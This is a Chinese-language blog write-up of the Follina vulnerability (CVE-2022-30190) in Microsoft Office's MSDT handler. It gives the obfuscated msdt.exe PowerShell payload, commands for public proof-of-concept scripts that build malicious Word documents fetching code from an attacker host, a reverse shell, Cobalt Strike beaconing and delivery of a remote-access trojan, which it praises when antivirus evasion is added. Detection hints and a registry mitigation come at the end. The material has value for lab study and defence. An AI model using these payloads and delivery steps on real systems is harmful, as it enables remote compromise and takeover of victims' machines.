- 1实现计算机的资源共享,如何实现局域网内计算机资源的共享.doc
- 2基于Spring Boot的校园论坛交流系统设计与实现 毕业设计源码47112_基于springboot框架开发的校园论坛系统(毕设源码)
- 3学习四大定律_学习时间520定律
- 45.Jenkins入门基础使用补充说明与相关问题总结_jenkins url
- 5git 查看公共commit_你真的懂git 吗
- 6Sealos急速部署生产用k8s集群
- 7【Git】Git学习-13:Gitee和GitLab的使用
- 8【小沐学前端】Windows下搭建WordPress(nginx1.25、PHP8.2、WordPress6.3、MySQL5.7)_windows 部署wordpress
- 9【网站项目】SpringBoot813社区医院管理系统
- 10物联网海量时序数据存储有哪些挑战?_物联网存储时代
CVE-2022-30190:Microsoft office MSDT 代码执行漏洞_cve-2022-30190那个版本的office
赞
踩
漏洞概述
该漏洞首次发现在2022 年 5 月 27 日,由白俄罗斯的一个 IP 地址上传。恶意文档从 Word 远程模板功能从远程 Web 服务器检索 HTML 文件,通过 ms-msdt MSProtocol URI方法来执行恶意PowerShell代码。感染过程利用 Windows 程序 msdt.exe,该程序用于运行各种 Windows 疑难解答程序包。此工具的恶意文档无需用户交互即可调用它。导致在宏被禁用的情况下,恶意文档依旧可以使用 ms-msdt URI执行任意PowerShell代码。
影响版本
目前已知影响的版本为:
-
office 2021 Lts
-
office 2019
-
office 2016
-
Office 2013
-
Office ProPlus
-
Office 365
漏洞复现
官方payload
msdt.exe /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"在cmd中运行即可弹出计算器:
环境部署
office下载地址:https://otp.landian.vip/zh-cn/download.html
因为已经部署好了,简单截图说明一下:
windows环境用了:
环境说明:
攻击机ip:192.168.84.205
目标靶机ip:192.168.84.185
使用poc1:
下载地址:https://github.com/chvancooten/follina.py
在攻击机执行:python3 .\follina.py -t docx -m binary -b \windows\system32\calc.exe -u 192.168.84.205
生成恶意docx文档:
将clickme.docx放在靶机打开:
这里远程加载恶意文件,生活中遇到这种情况可以警惕了。
程序错误诊断,然后弹出计算器:
攻击机可以看到远程加载请求:
复现成功。
我们肯定不满足于弹出计算器,如何深度利用获取权限呢?
使用poc2
poc1的命令执行没看懂。
下载地址:https://github.com/JohnHammond/msdt-follina
CS上线
在cs上生成木马,这个不用多说。
创建pocexe文件夹,将nc,cs木马放进去,并在该目录下开启简单的http.server服务:
开启服务:python -m http.server 8080
改poc(follina.py)文件下载路径:
生成恶意文档:python follina.py -i 192.168.84.205 -p 8000 -r 5555 #-r为反弹shell的端口,这里暂时用不到
将生成的follina.doc放在靶机打开:
看到cs上线:
查看进程:
文件存在:
nc反弹shell:
改poc配置:
执行命令:python follina.py -i 192.168.84.205 -p 8000 -r 5555 #这里用到了 -r 反弹shell
将生成得doc文档放在靶机执行:
反弹shell成功:
看到nc运行:
大灰狼远控
用了7.5的版本,9.5的版本在虚拟机运行报错,大半天都没解决。
生成木马:
系统设置,配置监听端口:
然后与上面的两种方式一样,加载大灰狼木马
目标机运行:
上线:
免杀做好,还是比较强大的:
简单分析
将doc文件后缀改为zip:
解压:
可以根据这个ip溯源反制。
检测的思路:
从cmd/msedge/office这些进程诞生的msdt.exe进程是可疑的。msdt.exe里参数带有/../../xxxx/.exe,恶意payload。 直接检测这个也是可以的。修复建议
以管理员身份运行命令提示符,执行以下两条命令:
reg export HKEY_CLASSES_ROOT\ms-msdt filenamereg delete HKEY_CLASSES_ROOT\ms-msdt /f撤消解决方法:
reg import filename总结
对大佬们的文章进行了资源整合。这里仅作线下学习,如有违法行为,与本人无关。
参考文章
https://blog.csdn.net/weixin_45329947/article/details/125089243
https://www.cnblogs.com/bonelee/p/16337291.html
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。
免费领取安全学习资料包!
渗透工具
技术文档、书籍
面试题
帮助你在面试中脱颖而出
视频
基础到进阶
环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
应急响应笔记
学习路线
